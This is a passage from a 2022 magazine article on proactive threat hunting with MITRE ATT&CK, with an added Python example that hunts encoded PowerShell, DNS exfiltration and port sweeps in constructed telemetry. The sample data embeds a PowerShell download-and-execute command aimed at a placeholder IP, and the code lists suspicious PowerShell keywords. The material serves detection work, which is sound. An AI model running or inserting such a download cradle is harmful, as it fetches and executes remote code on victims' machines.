Australian Cyber Security Magazine, ISSUE 13, 2022

Page 24


Cyber Threat Hunting leveraging MITRE ATT&CK Framework – Must for Modern SOC By Neha Dhyani

Threat hunting is a proactive cyber defense activity focused on pursuing attacks and the evidence attackers leave behind while they conduct reconnaissance, deploy advanced malware or exfiltrate critical data. Rather than relying only on reactive information, or hoping that a SOC (Security Operations Center) tool will flag and alert on suspicious activity, the threat hunter applies human analytical capacity and an understanding of the environment's context to determine more quickly when an unauthorized incident has occurred. Threat hunting allows attacks to be discovered in their early phases, with the goal of stopping them before adversaries can carry out their objectives. While skill and experience certainly help, the ever-changing landscape of threat actors and their growing sophistication require the threat hunter to take a well-organized approach: follow an open framework such as MITRE ATT&CK that structures a methodical hunt around the current TTPs (tactics, techniques and procedures) of the top global threat actors.
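The kind of structured hunt the paragraph describes, as an added example that is not the article's or any vendor's code: each hunt hypothesis is keyed to a real ATT&CK technique and tactic (T1059.001 Execution, T1048.003 Exfiltration, T1046 Discovery) and is tested against telemetry rather than waiting for an alert. The event schema, field names, thresholds and the sample SIEM-style events are assumptions constructed for illustration.

```python
"""Hypothesis-driven hunt structured by MITRE ATT&CK technique IDs.
Added example, not the article's or any vendor's code: the event schema, field
names and telemetry are constructed; the ATT&CK IDs and tactics are the real ones."""
from __future__ import annotations
import base64, math, re
from dataclasses import dataclass
from datetime import datetime
from typing import Callable

@dataclass(frozen=True)
class Hypothesis:
    technique: str      # ATT&CK technique ID
    tactic: str         # tactic the technique sits under
    question: str       # what the hunter asks of the data
    test: Callable[[list[dict]], list[dict]]  # returns one finding per hit

# --- Constructed sample telemetry in a SIEM-export style (all fields assumed) ---
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
def _b64(s: str) -> str: return base64.b64encode(s.encode("utf-16le")).decode()  # -enc form

EVENTS = [
    {"type": "process", "ts": "2022-03-01T09:12:03+00:00", "host": "ws-17", "image": _PS,
     "parent": "WINWORD.EXE", "cmdline": f"powershell.exe -nop -w hidden -enc {_b64(_PAYLOAD)}"},
    {"type": "process", "ts": "2022-03-01T09:15:40+00:00", "host": "ws-22", "image": _PS,
     "parent": "explorer.exe", "cmdline": f"powershell.exe -EncodedCommand {_b64('Get-Date')}"},
    {"type": "dns", "ts": "2022-03-01T09:20:00+00:00", "host": "ws-17", "qname": "www.example.com."},
    {"type": "dns", "ts": "2022-03-01T09:21:00+00:00", "host": "ws-17",  # long but repetitive,
     "qname": "deadbeef" * 6 + ".cdn.example.net."},                       # CDN-style label
    {"type": "dns", "ts": "2022-03-01T09:22:00+00:00", "host": "ws-17",  # long and high-entropy
     "qname": "".join(chr(97 + (i * 7) % 26) for i in range(48)) + ".t.example.org."},
] + [  # one host touching 12 different internal addresses on 445 inside a minute
    {"type": "network", "ts": f"2022-03-01T09:41:{i:02d}+00:00", "host": "ws-17",
     "dst_ip": f"10.0.0.{10 + i}", "dst_port": 445} for i in range(12)
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
ENC_FLAG = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
SUSPICIOUS = ("iex", "invoke-expression", "downloadstring", "frombase64string")

def hunt_encoded_powershell(events: list[dict]) -> list[dict]:
    """T1059.001: decode -EncodedCommand payloads launched by Office or fetching remote code."""
    findings = []
    for e in events:
        m = ENC_FLAG.search(e["cmdline"]) if e["type"] == "process" else None
        if not m or not e["image"].lower().endswith("powershell.exe"):
            continue
        decoded = base64.b64decode(m.group(1)).decode("utf-16le", errors="replace")
        if e["parent"].lower() in OFFICE_PARENTS or any(s in decoded.lower() for s in SUSPICIOUS):
            findings.append({"host": e["host"], "ts": e["ts"], "parent": e["parent"], "decoded": decoded})
    return findings

def _entropy(s: str) -> float:
    """Shannon entropy in bits per character."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in (s.count(ch) for ch in set(s))) if n else 0.0

def hunt_dns_exfil(events: list[dict], min_len: int = 40, min_entropy: float = 3.5) -> list[dict]:
    """T1048.003: long AND high-entropy subdomains, so repetitive CDN labels do not fire."""
    findings = []
    for e in events:
        if e["type"] != "dns":
            continue
        sub = ".".join(e["qname"].rstrip(".").split(".")[:-2])  # assumes a two-label registered domain
        if len(sub) >= min_len and _entropy(sub) >= min_entropy:
            findings.append({"host": e["host"], "ts": e["ts"], "qname": e["qname"], "entropy": round(_entropy(sub), 2)})
    return findings

def hunt_port_sweep(events: list[dict], min_targets: int = 10, window_s: int = 60) -> list[dict]:
    """T1046: one host reaching many distinct addresses on one port in a short window (aggregate check)."""
    by_key: dict[tuple, list] = {}  # (host, port) -> [(time, dst_ip), ...]
    for e in events:
        if e["type"] == "network":
            by_key.setdefault((e["host"], e["dst_port"]), []).append((datetime.fromisoformat(e["ts"]), e["dst_ip"]))
    findings = []
    for (host, port), conns in by_key.items():
        for start, _ in sorted(conns):  # slide the window from each connection in turn
            targets = {ip for t, ip in conns if 0 <= (t - start).total_seconds() <= window_s}
            if len(targets) >= min_targets:
                findings.append({"host": host, "dst_port": port, "targets": len(targets), "start": start.isoformat()})
                break
    return findings

HYPOTHESES = [
    Hypothesis("T1059.001", "Execution", "Is PowerShell running encoded commands from Office"
               " or pulling remote code?", hunt_encoded_powershell),
    Hypothesis("T1048.003", "Exfiltration", "Are hosts resolving long, high-entropy names"
               " that could carry data out?", hunt_dns_exfil),
    Hypothesis("T1046", "Discovery", "Is any host sweeping many internal addresses on one port?",
               hunt_port_sweep),
]

def run_hunt(events: list[dict], hypotheses: list[Hypothesis] = HYPOTHESES) -> list[dict]:
    """Run every hypothesis; tag findings with technique and tactic so they report in ATT&CK terms."""
    return [{"technique": h.technique, "tactic": h.tactic, **f} for h in hypotheses for f in h.test(events)]

if __name__ == "__main__":
    for finding in run_hunt(EVENTS):
        print(finding)
```

Two points a hunter would take from this. First, the decoded PowerShell from explorer.exe and the long but repetitive CDN label both drop out, which is the difference between a hunt and a grep: context (parent process, entropy, count of distinct targets) is part of the hypothesis, not a triage step bolted on afterwards. Second, the port-sweep hypothesis is an aggregate over many events rather than a per-event match, which is the shape most discovery and lateral-movement hunts take; the thresholds (40 characters, 3.5 bits, 10 targets in 60 seconds) are starting points to be tuned against each environment's baseline.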

Simplifying SOC complexity in an evolving threat landscape

As per the Gartner Board of Directors Survey 2022, 88% of respondents viewed cybersecurity-related risk as a business risk, not just a technology risk, and 51% of respondents had experienced a cybersecurity risk incident in the past two years. By preparing for the inevitable breach, rather than expecting that it will always be prevented, organizations running a modern SOC with threat hunting capabilities can deliver a better security posture and set the foundation for their team to proactively hunt for advanced threats.

As per the VMware Global Incident Response Threat Report (2021), respondents indicated that targeted victims now experience integrity and destructive attacks more than 50% of the time. More than 60% of respondents reported ransomware attacks during the past 12 months, and these attacks are becoming increasingly malicious. This escalation stems from adversaries running multistage campaigns involving penetration, persistence, data theft and extortion. These figures show that attacks are becoming more stealthy, destructive and targeted, and that they rely on advanced techniques.

As per IBM's Cost of a Data Breach Report 2021, it took an average of 287 days to identify and contain a data breach: on average, organizations take more than seven months to detect a malicious attack and another 81 days to contain it. The average cost of a breach whose lifecycle exceeds 200 days is $4.87 million, which means that every second counts. The attacks that cause the most damage, and are hardest to detect and prevent, are Advanced Persistent Threats (APTs), carried out over prolonged dwell times. Cyber threat hunting is particularly needed in battling APTs

